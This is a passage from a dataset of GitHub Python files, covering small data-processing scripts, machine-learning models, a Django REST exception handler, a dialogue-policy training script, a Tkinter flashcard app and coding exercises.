jsonArray\n\ndef write_built_in(file,data):\n with open(file, 'w', encoding='utf-8') as f: \n f.write(json.dumps(data, indent=4)) \n \ndef read_data_to_list(file_name):\n file = open(file_name)\n content = file.readlines()\n file.close()\n return content\n\n\n\ndef write_data(file_name, data):\n file = open(file_name, 'w')\n file.write(data)\n file.close()\n \n \ndef main():\n data = read_data_to_list(\"input.csv\")\n converter = ManualCsvConverter(data)\n result = converter.to_json()\n write_data(\"output.json\", result)\n \n# data=read_built_in(\"input.csv\")\n# write_built_in(\"output.json\",data)\n \nif __name__ == \"__main__\":\n main()","repo_name":"NastiaSmirnova/Python_practice","sub_path":"csv_to_json/converter_to_json.py","file_name":"converter_to_json.py","file_ext":"py","file_size_in_byte":967,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"30547054179","text":"#!/usr/bin/env python3\nimport json\nimport itertools\nfrom textwrap import dedent\nfrom pathlib import Path\nfrom typing import Container\n\n\ndef locate_critters(fu_root: Path, relative_path: str) -> Container[Path]:\n critters_dir = fu_root / relative_path\n return [critter.relative_to(fu_root) for critter in critters_dir.glob('**/*.monstertype')]\n\n\ndef write_patch(src_root: Path, critter: Path) -> None:\n patch_file = Path(str(src_root / critter) + '.patch')\n patch_file.parent.mkdir(parents=True, exist_ok=True)\n patch = dedent(\"\"\"\n [\n {\n \"op\" : \"replace\",\n \"path\" : \"/baseParameters/statusSettings/stats/maxHealth\",\n \"value\" : { \"baseValue\" : 50000 }\n },\n {\n \"op\" : \"replace\",\n \"path\" : \"/baseParameters/statusSettings/stats/healthRegen\",\n \"value\" : { \"baseValue\" : 50000 }\n }\n ]\"\"\")\n patch_file.write_text(patch)\n\n\ndef update_metadata(fu_root: Path, src_root: Path):\n fu = json.loads((fu_root / '.metadata').read_text())\n src = json.loads(\"\"\"\n {\n \"author\" : \"the-nick-of-time\",\n \"description\" : \"Extends the effects of HaxoXD's Immortal Critters mod to the critters added by Frackin Universe\",\n \"includes\" : [],\n \"friendlyName\" : \"FU Immortal Critters\",\n \"name\" : \"FUcritters\",\n \"requires\" : [\"immortalcritters\", \"FrackinUniverse\"],\n \"version\" : \"1.0\"\n }\"\"\")\n src['version'] = fu['version']\n (src_root / '.metadata').write_text(json.dumps(src, indent=2))\n\n\ndef main():\n here = Path(__file__).parent.absolute()\n fu_root = here.parent / 'dependencies/FrackinUniverse'\n src_root = here / 'src'\n critters = locate_critters(fu_root, 'monsters/critter')\n bees = locate_critters(fu_root, 'monsters/bees')\n for critter in itertools.chain(critters, bees):\n write_patch(src_root, critter)\n update_metadata(fu_root, src_root)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"the-nick-of-time/Starmod","sub_path":"FU_ImmortalCritters/generate_patch.py","file_name":"generate_patch.py","file_ext":"py","file_size_in_byte":2294,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"19217078327","text":"s = \"Zbcdefg\"\nlst=[]\nlst1=[]\nfor i in s:\n # if i.isupper():\n # lst1.append(i)\n # else:\n lst.append(i)\nlst.sort(reverse=True)\n# lst1.sort(reverse=True)\n\n\nanswer = ''\nfor i in lst:\n answer = answer + i\n\nprint(answer)","repo_name":"CompletelyPark/python","sub_path":"programmers/문자열 내림차순으로 배치.py","file_name":"문자열 내림차순으로 배치.py","file_ext":"py","file_size_in_byte":233,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"44050520793","text":"import torch\nimport torch.nn as nn\nimport torch.nn.init as init\nfrom torchvision.models import resnet50\n\n\nclass Resnet50(nn.Module):\n def __init__(self, embedding_size, pretrained=True, is_norm=True, bn_freeze=True, add_gmp=True):\n super(Resnet50, self).__init__()\n\n self.model = resnet50(pretrained)\n self.is_norm = is_norm\n self.add_gmp = add_gmp\n self.embedding_size = embedding_size\n self.num_ftrs = self.model.fc.in_features\n self.model.gap = nn.AdaptiveAvgPool2d(1)\n self.model.gmp = nn.AdaptiveMaxPool2d(1)\n\n self.model.embedding = nn.Linear(self.num_ftrs, self.embedding_size)\n self._initialize_weights()\n\n if bn_freeze:\n for m in self.model.modules():\n if isinstance(m, nn.BatchNorm2d):\n m.eval()\n m.weight.requires_grad_(False)\n m.bias.requires_grad_(False)\n\n if is_norm:\n self.lnorm = nn.LayerNorm(embedding_size, elementwise_affine=False).cuda()\n\n def forward(self, x):\n x = self.model.conv1(x)\n x = self.model.bn1(x)\n x = self.model.relu(x)\n x = self.model.maxpool(x)\n x = self.model.layer1(x)\n x = self.model.layer2(x)\n x = self.model.layer3(x)\n x = self.model.layer4(x)\n\n avg_x = self.model.gap(x)\n\n if self.add_gmp:\n max_x = self.model.gmp(x)\n x = max_x + avg_x\n else:\n x = avg_x\n\n x = x.view(x.size(0), -1)\n x = self.model.embedding(x)\n \n if self.is_norm:\n x = self.lnorm(x)\n \n return x\n\n def _initialize_weights(self):\n init.kaiming_normal_(self.model.embedding.weight, mode='fan_out')\n init.constant_(self.model.embedding.bias, 0)\n\n\n","repo_name":"ljin0429/HIST","sub_path":"code/net/resnet.py","file_name":"resnet.py","file_ext":"py","file_size_in_byte":1816,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"32"} +{"seq_id":"42927859969","text":"import logging\nimport rest_framework.views\nfrom rest_framework import status\nfrom rest_framework.exceptions import APIException\n\n\nlogger = logging.getLogger(__name__)\n\n\nclass APIError(APIException):\n status_code = status.HTTP_400_BAD_REQUEST\n default_detail = 'Некорректный запрос'\n default_code = 'invalid'\n\n def __init__(self, objects_name=None, invalid_objects=None, detail=None, status_code=None, details=None, **kwargs):\n super().__init__(detail=detail, **kwargs)\n self.invalid_objects = invalid_objects\n self.objects_name = objects_name\n self.details = details\n\n if status_code is not None:\n self.status_code = status_code\n\n if not isinstance(self.detail, str):\n raise ValueError('supported only str detail')\n\n\nclass Http400(APIError):\n pass\n\n\ndef exception_handler(exc, context):\n logger.exception(f'caught unhandled exception: {exc}')\n response = rest_framework.views.exception_handler(exc, context)\n\n if response is None:\n return response\n\n if isinstance(exc, APIError):\n response.data.pop('detail')\n response.data['validation_error'] = {exc.objects_name: exc.invalid_objects}\n response.data['details'] = exc.details\n\n if isinstance(exc, Http400):\n response.data.pop('validation_error')\n response.data['details'] = exc.details\n\n return response\n","repo_name":"kpestov/candy_delivery","sub_path":"app/main/exceptions.py","file_name":"exceptions.py","file_ext":"py","file_size_in_byte":1411,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"5258038687","text":"from tensorflow import keras\nfrom tensorflow.keras import layers\nfrom tensorflow.keras.models import Model\nfrom models.encoders.resnet_18 import *\n\ndef resnet_fpn(input_shape, num_heads=1):\n\n model = fpn(resnet_18, input_shape, num_heads=num_heads)\n model.model_name = f\"resnet_fpn__{num_heads}_heads\"\n \n return model\n\n\ndef fpn(encoder, input_shape, num_heads=1):\n\n image_input = layers.Input(shape=input_shape)\n # mask = layers.Input(shape=input_shape)\n \n image_input, levels = encoder(image_input)\n [f0, f1,f2,f3,f4] = levels\n # paper says: f0 should be disregarded due to high memory footprint.\n\n # ***** FPN *****\n # 7x7 to 14x14\n P4 = f4\n f4_prime = layers.Conv2D(256, (1,1))(P4)\n x = layers.UpSampling2D((2, 2))(f4_prime)\n f3_prime = layers.Conv2D(256, (1,1))(f3)\n x = layers.Add()([x, f3_prime])\n x = layers.Conv2D(256, (3, 3), padding='same')(x)\n x = layers.BatchNormalization(axis=-1)(x)\n P3 = layers.Activation(\"relu\")(x)\n\n\n # 14x14 to 28x28\n x = layers.UpSampling2D((2, 2))(P3)\n f2_prime = layers.Conv2D(256, (1,1))(f2)\n x = layers.Add()([x, f2_prime])\n x = layers.Conv2D(256, (3, 3), padding='same')(x)\n x = layers.BatchNormalization(axis=-1)(x)\n P2 = layers.Activation(\"relu\")(x)\n\n\n # 28x28 to 56x56\n x = layers.UpSampling2D((2, 2))(P2)\n f1_prime = layers.Conv2D(256, (1,1))(f1)\n x = layers.Add()([x, f1_prime])\n x = layers.Conv2D(256, (3, 3), padding='same')(x)\n x = layers.BatchNormalization(axis=-1)(x)\n P1 = layers.Activation(\"relu\")(x)\n\n\n\n # ***** UPSAMPLE *****\n # upsample to 1/4 org. image\n # P4 - 1\n up_p4 = layers.Conv2D(128, (3, 3), padding='same')(P4)\n up_p4 = layers.BatchNormalization(axis=-1)(up_p4) # tfa.layers.GroupNormalization()\n up_p4 = layers.Activation(\"relu\")(up_p4)\n up_p4 = layers.UpSampling2D((2, 2), interpolation=\"bilinear\")(up_p4)\n\n # P4 - 2\n up_p4 = layers.Conv2D(128, (3, 3), padding='same')(up_p4)\n up_p4 = layers.BatchNormalization(axis=-1)(up_p4) # tfa.layers.GroupNormalization()\n up_p4 = layers.Activation(\"relu\")(up_p4)\n up_p4 = layers.UpSampling2D((2, 2), interpolation=\"bilinear\")(up_p4)\n\n # P4 - 3\n up_p4 = layers.Conv2D(128, (3, 3), padding='same')(up_p4)\n up_p4 = layers.BatchNormalization(axis=-1)(up_p4) # tfa.layers.GroupNormalization()\n up_p4 = layers.Activation(\"relu\")(up_p4)\n up_p4 = layers.UpSampling2D((2, 2), interpolation=\"bilinear\")(up_p4)\n\n\n\n # P3 - 1\n up_p3 = layers.Conv2D(128, (3, 3), padding='same')(P3)\n up_p3 = layers.BatchNormalization(axis=-1)(up_p3) # tfa.layers.GroupNormalization()\n up_p3 = layers.Activation(\"relu\")(up_p3)\n up_p3 = layers.UpSampling2D((2, 2), interpolation=\"bilinear\")(up_p3)\n\n # P3 - 2\n up_p3 = layers.Conv2D(128, (3, 3), padding='same')(up_p3)\n up_p3 = layers.BatchNormalization(axis=-1)(up_p3) # tfa.layers.GroupNormalization()\n up_p3 = layers.Activation(\"relu\")(up_p3)\n up_p3 = layers.UpSampling2D((2, 2), interpolation=\"bilinear\")(up_p3)\n\n\n\n # P2 - 1\n up_p2 = layers.Conv2D(128, (3, 3), padding='same')(P2)\n up_p2 = layers.BatchNormalization(axis=-1)(up_p2) # tfa.layers.GroupNormalization()\n up_p2 = layers.Activation(\"relu\")(up_p2)\n up_p2 = layers.UpSampling2D((2, 2), interpolation=\"bilinear\")(up_p2)\n\n # P2\n up_p1 = layers.Conv2D(128, (3, 3), padding='same')(P1)\n up_p1 = layers.BatchNormalization(axis=-1)(up_p1) # tfa.layers.GroupNormalization()\n up_p1 = layers.Activation(\"relu\")(up_p1)\n\n\n # SUM ELEMENT WISE\n y = layers.Add()([up_p4, up_p3, up_p2, up_p1])\n y = layers.BatchNormalization(axis=-1)(y) # tfa.layers.GroupNormalization()\n y = layers.UpSampling2D((4, 4), interpolation=\"bilinear\")(y)\n y = layers.Conv2D(64, (3, 3), padding='same')(y)\n\n y = layers.BatchNormalization(axis=-1)(y) # tfa.layers.GroupNormalization()\n y = layers.Activation(\"relu\")(y)\n\n\n\n # REGRESSION\n stacked_many_heads_output = None\n for i in range(num_heads): # get multiple heads working\n output_reg = layers.Conv2D(3, (3, 3), padding='same')(y)\n # output_masked_reg = layers.Multiply()([output_reg, mask])\n \n if stacked_many_heads_output == None:\n stacked_many_heads_output = output_reg\n else:\n stacked_many_heads_output = layers.Concatenate(axis=-1)([stacked_many_heads_output, output_reg])\n \n\n # model = Model(inputs=[image_input, mask], outputs=stacked_many_heads_output) \n model = Model(inputs=image_input, outputs=stacked_many_heads_output) \n\n# model.summary()\n \n return model\n","repo_name":"janekzimoch/localisation_with_image","sub_path":"PlayGround/Multimodality/2D_set_of_explenations/models/decoders/fpn.py","file_name":"fpn.py","file_ext":"py","file_size_in_byte":4597,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"18414438732","text":"import pandas as pd \r\nimport sys\r\n\r\n\"\"\"\r\nUsage: python3 combine_files.py \r\nExample: python3 return_calc.py a.us.csv aa.us.csv\r\n\"\"\"\r\n\r\ndef main(argv):\r\n \r\n # Correctly parse in the arguments\r\n file = pd.read_csv(argv[1])\r\n arg1 = argv[1]\r\n tag = arg1[:-4]\r\n file['Tag'] = tag\r\n \r\n file2 = pd.read_csv(argv[2])\r\n arg2 = argv[2]\r\n tag2 = arg2[:-4]\r\n file2['Tag'] = tag2\r\n \r\n # Create new DF and add two files into it\r\n new_file = pd.DataFrame(columns=['Date','Open','High','Low','Close','Volume','OpenInt','Tag'])\r\n new_file = pd.concat([new_file, file])\r\n new_file = pd.concat([new_file, file2])\r\n \r\n # Sort new DF\r\n new_file = new_file.sort_values(by=['Date'], ascending = False)\r\n \r\n name = tag + '_' + tag2 + '.csv'\r\n # Save new csv file\r\n new_file.to_csv(name)\r\n \r\n\r\n\r\nif __name__ == '__main__':\r\n argv = sys.argv\r\n main(argv)\r\n","repo_name":"csci4502-group4/code","sub_path":"scripts/combine_files.py","file_name":"combine_files.py","file_ext":"py","file_size_in_byte":929,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"29968790257","text":"\ndef quad_sequence(lst):\n #find pattern\n difference = [lst[len(lst)-2] - lst[len(lst)-3], lst[len(lst)-1] - lst[len(lst)-2]]\n difference_of_difference = difference[1] - difference[0]\n #workout\n last_num = lst[len(lst)-1]\n last_diff = difference[1]\n next_nums = []\n for _ in range(len(lst)):\n last_diff+=difference_of_difference\n last_num +=last_diff\n next_nums.append(last_num)\n return next_nums\n\n","repo_name":"daniel-reich/ubiquitous-fiesta","sub_path":"YcqAY72nZNPtvofuJ_8.py","file_name":"YcqAY72nZNPtvofuJ_8.py","file_ext":"py","file_size_in_byte":415,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"26690877308","text":"import pickle\n\nfrom convlab.policy.vtrace_rnn_action_embedding import VTRACE_RNN\nfrom convlab.policy.vtrace_rnn_action_embedding.train import evaluate\n\n\ndef avg_token(utterances, min_avg=1.2):\n token = []\n for turn in utterances:\n if turn != '':\n token.append(len(turn.split()))\n avg_len = (sum(token)) / len(token)\n if avg_len < min_avg:\n return False\n return True\n\n\ndef word_token_ratio(utterances, ratio=0.2):\n unique_word = []\n token_num = 0\n for turn in utterances:\n if turn != '':\n for token in turn.split():\n token_num += 1\n if token not in unique_word:\n unique_word.append(token)\n if len(unique_word) / token_num < ratio:\n return False\n return True\n\n\ndef process_ppo_data(path):\n with open(path, 'rb') as file:\n memory = pickle.load(file)\n\n feedback = memory.feedback\n states = memory.states\n actions = memory.actions\n rewards = memory.rewards\n probs = memory.action_probs\n sys_output = memory.sys_outputs\n utterances = memory.utterances\n\n new_actions = []\n\n for i, action_list in enumerate(actions):\n new_action_list = []\n for j, action in enumerate(action_list):\n new_action_list.append({\"action_index\": action, \"mu\": probs[i][j], \"mask\": [0] * (len(action)+2)})\n new_actions.append(new_action_list)\n\n return feedback, states, new_actions, rewards, sys_output, utterances\n\n\nmemory_path = \"convlab/policy/best_policies/AMT_memory_for_prefilling.pkl\"\namt_data_path = \"AMT_Experiments_AMT_REAL_VTRACE_RNN_AGENT_2020-09-02-15-10-49_AMT_memory.pkl\"\nppo_data_path = \"AMT_Experiments_AMT_REAL_PPO_RNN_AGENT_2020-09-02-15-22-25_AMT_memory.pkl\"\n\nwith open(amt_data_path, 'rb') as file:\n memory = pickle.load(file)\n\nutterances = memory.utterances\nfeedback = memory.feedback\nstates = memory.states\nactions = memory.actions\nrewards = memory.rewards\nsys_output = memory.sys_outputs\n\nprint(\"Length of Dataset: \", len(feedback))\n\nppo_feedback, ppo_states, ppo_actions, ppo_rewards, ppo_outputs, ppo_utterances = process_ppo_data(ppo_data_path)\n\nmemory.feedback.extend(ppo_feedback)\nmemory.states.extend(ppo_states)\nmemory.actions.extend(ppo_actions)\nmemory.rewards.extend(ppo_rewards)\nmemory.sys_outputs.extend(ppo_outputs)\nmemory.utterances.extend(ppo_utterances)\n\nwith open('AMT_memory_merged.pkl', 'wb') as output:\n pickle.dump(memory, output, pickle.HIGHEST_PROTOCOL)\n\ndelete_indices = []\nfor i in range(0, len(states)):\n found = False\n if len(states[i]) == 0 or len(actions[i]) == 0 or len(rewards[i]) == 0:\n delete_indices.append(i)\n continue\n if len(utterances[i]) == 0:\n delete_indices.append(i)\n continue\n for ut in utterances[i]:\n if len(ut) == 0:\n delete_indices.append(i)\n found = True\n break\n if found:\n continue\n if len(utterances[i]) < 4:\n delete_indices.append(i)\n continue\n if not word_token_ratio(utterances[i]):\n delete_indices.append(i)\n continue\n if not avg_token(utterances[i]):\n delete_indices.append(i)\n continue\n\nlist(set(delete_indices))\n\nfor n, i in enumerate(delete_indices):\n\n if n<100:\n continue\n\n print(f\"Dialog {i}\" + \"-\"*80)\n fb = feedback[i]\n utt = utterances[i]\n sys_out = sys_output[i]\n\n for u, s in zip(utt, sys_out):\n print(\"User: \", u)\n print(\"System\", s)\n print(\"Feedback: \", fb)\n print(n)\n if n == 200:\n break\n\n\nprint(\"Dialogues before cleaning: \", len(states))\nprint(\"Dialogues that will be cleaned: \", len(delete_indices))\n\nstates = [states[i] for i in range(len(states)) if i not in delete_indices]\nactions = [actions[i] for i in range(len(actions)) if i not in delete_indices]\nrewards = [rewards[i] for i in range(len(rewards)) if i not in delete_indices]\nfeedback = [feedback[i] for i in range(len(feedback)) if i not in delete_indices]\n\nnum_good = 0\nsuccesful = 0\nfor reward, fb in zip(rewards, feedback):\n #print(\"reward: \", reward)\n #print(\"feedback: \", fb)\n if -1 not in reward:\n num_good += 1\n if fb:\n succesful += 1\n\nprint(f\"We have {num_good} good out of {len(rewards)}\")\nprint(f\"We have {succesful} successful out of {len(feedback)}\")\n\nnew_rewards = []\nfor i, reward in enumerate(rewards):\n new_rewards.append([-1] * len(reward))\n if feedback[i]:\n new_rewards[-1][-1] += 80\n else:\n new_rewards[-1][-1] += -40\n\nrewards = new_rewards\nprint(\"Length of Dataset after cleaning: \", len(states))\n#print(rewards)\n\n\nmodel_path = \"convlab/policy/best_policies/RNN_supervised\"\npolicy = VTRACE_RNN(is_train=True, seed=0, shrink=True, noisy=True)\npolicy.load(model_path)\n\ntry:\n policy.prefill_buffer_from_amt(memory_path)\n print(\"Successfully prefilled buffer with AMT data\")\nexcept:\n print(\"Could not prefill buffer with AMT data\")\n\noffset = 0\nfor i in range(offset):\n policy.update_memory(None, states[i], actions[i], rewards[i])\n\nupdate_round = 20\neval_freq = 400\n\nfor i in range(len(feedback) - offset):\n\n if i % eval_freq == 0 and i != 0:\n print(\"Evaluating\")\n evaluate(policy_sys=policy)\n\n policy.update_memory(None, states[offset + i], actions[offset + i], rewards[offset + i])\n if i % update_round == 0:\n print(\"Updating\")\n for k in range(1):\n policy.update()\n","repo_name":"ConvLab/ConvLab-3","sub_path":"convlab/policy/train_on_AMT.py","file_name":"train_on_AMT.py","file_ext":"py","file_size_in_byte":5416,"program_lang":"python","lang":"en","doc_type":"code","stars":89,"dataset":"github-code","pt":"32"} +{"seq_id":"7376596786","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat Oct 20 00:06:25 2018\r\n\r\n@author: joann\r\n\"\"\"\r\nimport numpy as np\r\nimport pandas as pd\r\nfrom scipy import stats\r\nfrom datetime import datetime as dt\r\n#Display or graph 3 metrics or trends from the data set that are interesting to you.\r\n#Which start/stop stations are most popular?\r\n#What is the average distance traveled\r\n#How many riders include bike sharing as a regular part of their commute?\r\n\r\n#3 trends: Duration, plan duration, Passholder\r\n\r\n#Regular user -> monthly user \r\n\r\n#Duration unit: seconds\r\n\r\n#average distance: using latitude and longitude?\r\n\r\n#below is for testing comparing dates\r\n#a = dt.strptime('2016-07-07','%Y-%m-%d')\r\n#b = dt.strptime('2016-07-08', '%Y-%m-%d')\r\n#print(a < b)\r\n\r\ndf = pd.read_csv('metro-bike-share-trip-data.csv')\r\n#check if bike riders have taken rides twice in the same day\r\ncounter = 0\r\nfor i in df['Start Time']:\r\n date = df['Start Time'][i][:10]\r\n specificDate = df[['Start Time'] == date]\r\n #still trying to determine how to increment date\r\n for p in specificDate['Bike ID']: #I'm aware this is inefficient, but if I had more time\r\n #I would try to figure out a more efficient method\r\n for p2 in range(1,len(specificDate['Bike ID'])):\r\n if p == p2:\r\n counter = counter + 1 #increment counter\r\n\r\n\r\n#print(df['Starting Station ID'].describe())\r\nprint(df['Duration'].describe()) #figure out how to neatly display information\r\n#box plot for the above currently looks very messy\r\nstartStationMode = stats.mode(df['Starting Station ID'])\r\nendStationMode = stats.mode(df['Ending Station ID'])\r\nprint('Most popular start station: ', startStationMode)\r\nprint('Most popular end station: ', endStationMode)\r\n\r\n","repo_name":"joannacao/Bikeshare-data-analysis","sub_path":"bikeshare-data.py","file_name":"bikeshare-data.py","file_ext":"py","file_size_in_byte":1742,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"17967487159","text":"BACKGROUND_COLOR = \"#B1DDC6\"\n\nfrom tkinter import *\nimport pandas\nimport random\n\n\ncurrent_card = {}\nto_learn = {}\nwindow = Tk()\nwindow.title(\"FRENCH FLASH\")\n\n\n\n\n\n\ntry:\n data = pandas.read_csv (\"data/words_to_learn.csv\")\nexcept FileNotFoundError:\n original_data = pandas.read_csv (\"data/french_words.csv\")\n to_learn = original_data.to_dict (orient=\"records\")\nelse:\n to_learn = data.to_dict (orient=\"records\")\n\ndef french_text():\n global current_card,flip_timer\n current_card = random.choice(to_learn)\n canvas.itemconfig(french_word, text=current_card[\"French\"], fill=\"black\")\n\n\n\ndef flip_card():\n canvas.itemconfig(french_title, text=\"English\", fill=\"black\")\n canvas.itemconfig(french_word, text=current_card[\"English\"], fill=\"black\")\n canvas.itemconfig(front_img, image=card_back)\n canvas.itemconfig(back_img, image=card_front)\n\ndef known_word():\n to_learn.remove(current_card)\n print(len(to_learn))\n french_text()\n data = pandas.DataFrame(to_learn)\n data.to_csv(\"data/words to learn\", index=False)\n\n\ncanvas = Canvas(width=800, height=526, highlightthickness=0)\nwindow.minsize(width=800, height=525)\nwindow.config(pady=50, padx=50, background=BACKGROUND_COLOR)\ncard_back = PhotoImage(file=\"images/card_back.png\")\nback_img = canvas.create_image(400, 263, image=card_back)\n\ncard_front = PhotoImage(file=\"images/card_front.png\")\nfront_img = canvas.create_image(400, 263, image=card_front)\n\nfrench_title = canvas.create_text(400, 150, text=\"French\", font=(\"Ariel\", 40, \"bold\"), fill=\"black\" )\n\nfrench_word = canvas.create_text(400, 263, text=\"\", font=(\"Ariel\", 60, \"bold\"), fill=\"black\")\n\n\n\n\n\nfrench_text()\n\n\n\n\n\n\n\n\n\n\n\n\ncanvas.config(background=BACKGROUND_COLOR)\n\ncanvas.grid(column=1, row=1, columnspan=2)\nright_img = PhotoImage(file=\"images/right.png\")\nwrong_img = PhotoImage(file=\"images/wrong.png\")\nright_button = Button(image=right_img, highlightthickness=0, border=0, command=known_word)\n\nright_button.grid(column=2, row=2)\nright_button.config(highlightbackground=\"green\")\n\nwrong_button = Button(image=wrong_img, highlightthickness=0, border=0, command=french_text)\nwrong_button.config(background=BACKGROUND_COLOR)\nwrong_button.grid(column=1, row=2)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\nwindow.mainloop()","repo_name":"Mehrshadj3/French_flashcard","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2240,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"31396045073","text":"from sklearn.feature_extraction.text import CountVectorizer, TfidfVectorizer, TfidfTransformer\n\nfrom sklearn.naive_bayes import MultinomialNB\nfrom sklearn.model_selection import train_test_split, GridSearchCV\nimport pandas as pd\nimport nltk\n\nimport sklearn.metrics as met\n\nfrom nltk.stem import PorterStemmer\nfrom nltk.stem import LancasterStemmer\nfrom nltk.corpus import stopwords\n\nfrom nltk.tokenize import sent_tokenize, word_tokenize\n\nimport numpy as np\n\nfrom sklearn.svm import SVC\nfrom sklearn.neighbors import KNeighborsClassifier\n\nimport sklearn.preprocessing as prep\n\nporter = PorterStemmer()\nlancaster=LancasterStemmer()\n\ndef stemSentence(sentence):\n token_words=sentence.split(\" \")\n stem_sentence=[]\n for word in token_words:\n stem_sentence.append(porter.stem(word))\n stem_sentence.append(\" \")\n return \"\".join(stem_sentence)\n\n\n# print(porter.stem(sentence))\n\ndf = pd.read_csv('Hotel_Reviews.csv')\n\npositive = df['Positive_Review']\n\nnegative = df['Negative_Review']\n\n\ncorpus = []\n\ncount = 0\n\nfor row in positive :\n\n processed_row = stemSentence(row)\n\n corpus.append(processed_row)\n\n count+= 1\n\n if count == 3000 :\n break\n\ncount = 0\n\nfor row in negative :\n\n processed_row = stemSentence(row)\n\n corpus.append(processed_row)\n\n count+= 1\n\n if count == 3000 :\n break\n\n\nclasses = ['positive' if i < 3000 else 'negative' for i in range(6000)]\n\n\nvectorizer = TfidfVectorizer(stop_words='english')\nx_fitted = vectorizer.fit_transform(corpus)\n\nx_train, x_test, y_train, y_test = train_test_split(x_fitted, classes, stratify = classes, test_size = 0.3)\n\nclf = MultinomialNB()\n\nclf.fit(x_train, y_train)\n\ndf_visualisator = pd.DataFrame(clf.feature_count_, index =clf.classes_, columns = vectorizer.get_feature_names())\n\n\nhotels = df['Hotel_Name'].unique()\n\ncnt = 0\n\nnew_df = []\n\nfor h in hotels :\n\n if cnt == 100 :\n\n break\n\n diff_of_com = 0\n\n tmp_df = df.loc[df['Hotel_Name'] == h]\n\n average_score = tmp_df['Average_Score'].unique()\n\n num_reviews = tmp_df['Total_Number_of_Reviews'].unique()\n # print(tmp_df.head())\n\n for positive in tmp_df['Positive_Review'] :\n\n \n # positive_text = row['Positive_Review']\n\n # print(positive)\n\n x_predict = vectorizer.transform([positive])\n\n y_predict = clf.predict(x_predict)\n\n probabilies = clf.predict_proba(x_predict)\n\n s = pd.Series(probabilies[0], index = clf.classes_)\n\n diff_of_com += s[1] - s[0]\n\n for negative in tmp_df['Negative_Review'] :\n\n x_predict = vectorizer.transform([negative])\n\n y_predict = clf.predict(x_predict)\n\n probabilies = clf.predict_proba(x_predict)\n\n s = pd.Series(probabilies[0], index = clf.classes_)\n\n diff_of_com += s[1] - s[0]\n\n \n avg_negative_word_count = np.average(tmp_df['Review_Total_Negative_Word_Counts'])\n avg_positive_word_count = np.average(tmp_df['Review_Total_Positive_Word_Counts'])\n\n new_df.append([average_score[0], h, num_reviews[0], avg_positive_word_count, avg_negative_word_count, diff_of_com / num_reviews[0]])\n\n print('For hotel : {}'.format(h))\n\n cnt += 1\n # print (diff_of_com / num_reviews)\n\ndf = pd.DataFrame(new_df, columns = ['Average_Score', 'Hotel_Name', 'Num_Reviews', 'AVG_pos', 'AVG_neg', 'Pos_Negative_Proba'])\n\nlab_enc = prep.LabelEncoder()\n\n# new_df.set_index('Hotel_Name', inplace = True)\n\n# print(new_df.head())\n\ny = df['Average_Score']\n\n# y = lab_enc.fit_transform(y)\n\ny = ['very_bad' if e < 6 else e for e in y]\ny = ['bad' if not isinstance(e, str) and e < 7 else e for e in y]\ny = ['good' if not isinstance(e, str) and e < 8 else e for e in y]\ny = ['very_good' if not isinstance(e, str) and e < 9 else e for e in y]\ny = ['excelent' if not isinstance(e, str) and e < 10 else e for e in y]\n\n# y = np.round(y)\n\nfeatures = df.columns[2:].tolist()\nx=df[features]\n\nprint(x.columns)\n\n\nx_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.3)\n\n# print(x_train)\nprint(y_train)\n\n# clf = SVC(C=1.0, kernel='linear')\n# clf.fit(x_train, y_train)\n\n# Parametri za unakrsnu validacuju\nparameters_for_SVC = [{'C': [pow(2,x) for x in range(-6,10,2)],\n 'kernel' : ['linear']\n },\n\n {'C': [pow(2,x) for x in range(-6,10,2)],\n 'kernel': ['poly'],\n 'degree': [2, 3, 4, 5],\n 'gamma': np.arange(0.1, 1.1, 0.1),\n 'coef0': np.arange(0, 2, 0.5)\n },\n\n {'C': [pow(2,x) for x in range(-6,10,2)],\n 'kernel' : ['rbf'],\n 'gamma': np.arange(0.1, 1.1, 0.1),\n },\n\n {'C': [pow(2,x) for x in range(-6,10,2)],\n 'kernel' : ['sigmoid'],\n 'gamma': np.arange(0.1, 1.1, 0.1),\n 'coef0': np.arange(0, 2, 0.5)\n }]\n\n\nparameters_for_KNN = [\n {'n_neighbors': [3, 4, 5],\n 'weights' : ['distance', 'uniform'], \n 'p' : [1, 2]\n }]\n\n\n#Umesto SVC inde KNeighbour Classifier ako se biraju parametri za knn\nclf = GridSearchCV(KNeighborsClassifier(), parameters_for_KNN, cv=5, scoring='precision_macro')\nclf.fit(x_train, y_train)\n\n# print(clf.best_params_)\nprint(clf.best_score_)\nprint(clf.best_params_)\n\ny_predicted = clf.predict(x_train)\n\nprint(met.confusion_matrix(y_train, y_predicted))","repo_name":"akinovak/guess_rate","sub_path":"guess_rate.py","file_name":"guess_rate.py","file_ext":"py","file_size_in_byte":5359,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"43781913452","text":"# The Utopian Tree goes through 2 cycles of growth every year.\n# Each spring, it doubles in height.\n# Each summer, its height increases by 1 meter.\n\n# Laura plants a Utopian Tree sapling with a height of 1 meter at the onset of spring.\n# How tall will her tree be after n growth cycles?\n\n# For example, if the number of growth cycles is n=5, the calculations are as follows:\n\n# Period Height\n# 0 1\n# 1 2\n# 2 3\n# 3 6\n# 4 7\n# 5 14\n# 6 15\n# 7 30\n\n# cycle = [0, 1, 4, 3, 27]\n# answer [1, 2, 7, 6, 32766]\n\n\n\n\ndef _utopian (x):\n \"\"\"Funkcja 